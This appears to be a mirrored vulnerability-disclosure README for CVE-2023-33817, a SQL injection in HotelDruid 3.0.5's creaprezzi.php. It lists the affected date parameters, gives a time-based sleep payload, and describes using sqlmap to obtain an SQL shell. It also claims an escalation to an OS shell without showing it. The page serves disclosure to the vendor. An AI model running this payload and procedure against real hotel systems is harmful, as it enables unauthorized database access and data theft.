Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-33817 PoC — HotelDruid SQL注入漏洞

Source
https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5
Associated Vulnerability
Title:HotelDruid SQL注入漏洞 (CVE-2023-33817)
Description:HotelDruid是Digitaldruid.net团队的一套酒店管理系统。该系统包括客房管理、财务管理和库存管理等功能。 HotelDruid v3.0.5版本存在安全漏洞,攻击者利用该漏洞可以使用任意 sql 命令来检索数据库中的数据,甚至可以在目标数据库系统上执行远程代码。
Readme
# CVE-2023-33817 - SQL Injection found in HotelDruid V3.0.5


HotelDruid v3.0.5 are vulnerable to SQL injection. An attacker could issue arbitrary sql command to retrieve data in databases or even execute remote code execution on target database system

This is my second repo. Don't beat me if i didn't explain well.

Description of product : Hoteldruid is an open source program for hotel management (property management software) developed by DigitalDruid.Net.

Description of vulnerability : We found that this web application allowx any authenticated user such as admin or any user to inject malicious sql command into affected parameter to retrieve data in databases or even execute code execution on target system. Below are the steps to reproduce and again, dont beat me if i didn’t explain well.

Affected Webpage : creaprezzi.php
Affected Parameter&Component : 

inizioperiodo1
fineperiodo1
inizioperiodo2
fineperiodo2
inizioperiodo3
fineperiodo3
inizioperiodo4
&fineperiodo4
inizioperiodo5
fineperiodo5
inizioperiodo6
fineperiodo6
inizioperiodo7
fineperiodo7


Step 1: login and navigate to creaprezzi.php , the highligted part is the affected parameter in GUI


![sql main page](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5/assets/45155253/a5d21686-05c6-46a8-afdc-f3ca864e99b7)

Step 2 : Intercept with BurpSuite, and insert some basic payload like " '%2b(select*from(select(sleep(5)))a)%2b' " and monitor the response. the sceenshot below shows the server have returns the response after 5 seconds , it seems we can move abit deeper :-) .

![creaprezzi_php SQL_sleeppng](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5/assets/45155253/4636acd4-c234-46ee-adc5-e5043a8caf77)

Step 3 : what if we save this into a burp file and pass it to sqlmap? The screenahot below shows the result of sqkmap.

![sqlmap_result](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5/assets/45155253/80322732-37cd-4aa6-8dc9-a7df62f9f8e6)

Step 4 : We can expand abit more with below sqlmap command, i choose sql-shell . The screenshot below shown we can even execute sql command by abusing the vulnerable parameter.

![sqlmap_sql_shell](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5/assets/45155253/7df82b64-3a66-4049-a08f-c50ec8f0e173)

Ps : Above steps is just POC for vendor, actually i have climb from sql-shell to fully OS command shell, but this may need more and more steps and technique involved and i think this is beyond what CVE request us to demo . 

Screenshot below show the version of HotelDruid

![Version_HotelDruid_3 0 5](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5/assets/45155253/17d64e76-9bac-4c1d-8bc7-d4b726532f68)
File Snapshot

 [4.0K]  /data/pocs/812df4e2c6bc37f3dd51fcb189d4bf34b5a54b8b
└── [2.8K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.